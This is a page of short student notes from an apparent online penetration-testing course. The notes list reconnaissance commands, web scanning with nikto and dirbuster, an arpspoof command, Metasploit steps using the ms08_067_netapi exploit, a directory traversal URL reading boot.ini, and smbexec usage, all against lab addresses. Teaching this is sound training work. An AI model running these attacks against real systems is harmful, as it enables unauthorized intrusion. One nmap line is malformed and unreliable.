Advanced Penetration Testing Notes

information gathering

1. whois
2. nslookup
3. fierce -dns
4. host -t
5. zonetransfer: host -l

By: chennylmf | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: March 24, 2018

part 2

(Part 2: Vulnerable Web Applications)
192.168.1.23/bookservice (Windows 7 apps)
burpsuite
java -jar burpsuite.jar
locate burpsuite
On Applications, go to Kali Linux, go to Web Applications, go to Web Application Proxies, click burpsuite

By: GrapeApe561 | Related Lesson: WebApp (part 2) Vulnerable Web Applications | Modified: March 24, 2018

cut

cat file | cut -d " " -f 1 | sort -u

By: Musaid | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: March 24, 2018

arp spoof

arpspoof -i eth0 -t 192.168.1.76 192.168.1.80

By: amine.atarboulaich | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: March 22, 2018

vul scan web app

mysql -h 192.168.1.76
http://192.168.1.76
cadaver http://192.168.1.76/webdav
dirbuster
nikto -h http://localhost

By: amine.atarboulaich | Related Lesson: Vulnerability Scanning (part 5) WebApp, XAMPP, WEBDAV, nikto | Modified: March 22, 2018

vuls scan

msfconsole
use auxiliary/scanner/ftp/anonymous
show options
cat class.gnmap | grep Up | cut -d " " -f 2 | sort -u > livehosts.txt
set RHOSTS file:/root/livehosts.txt
run
use exploit/windows/smb/ms08_067_netapi
show options
set rhost

By: amine.atarboulaich | Related Lesson: Vulnerability Scanning (part 4) Metasploit | Modified: March 22, 2018

nmap vul scan

cd /usr/share/nmap/scripts/
nmap --script-help default
nmap --script-help smb-check-vulns
nmap --script-help nfs-ls
nmap -sC 192.168.1.76 192.168.1.80

By: amine.atarboulaich | Related Lesson: Vulnerability Scanning (part 3) Nmap Scripting Engine | Modified: March 22, 2018

vulnerability scanning

zervit 0.4 source code review —— zervit web server <ip(metasploit-linux):3232/index.html?.././../../boot.ini

By: dhruvgupta179 | Related Lesson: Vulnerability Scanning (part 6) Directory Transversals | Modified: March 22, 2018

part 4

(Part 4: Setting Up a Domain Controller)
cd /opt/smbexec (Might not need to do this if it doesn’t work)
./smbexec.rb
Select Choice 1, then Choice 7, then type Windows 7 IPv4 address when prompted with "Target IP, host list, or nmap XML

By: GrapeApe561 | Related Lesson: Post Exploitation (part 4) Setting Up a Domain Controller | Modified: March 21, 2018

NMAP

nc -v ip
nmap -sS ip -p 3232
nmap -sU ip pi =! -oA classudp -sV classversion

By: amine.atarboulaich | Related Lesson: Information Gathering (part 5) NMAP and PortScanning | Modified: March 21, 2018
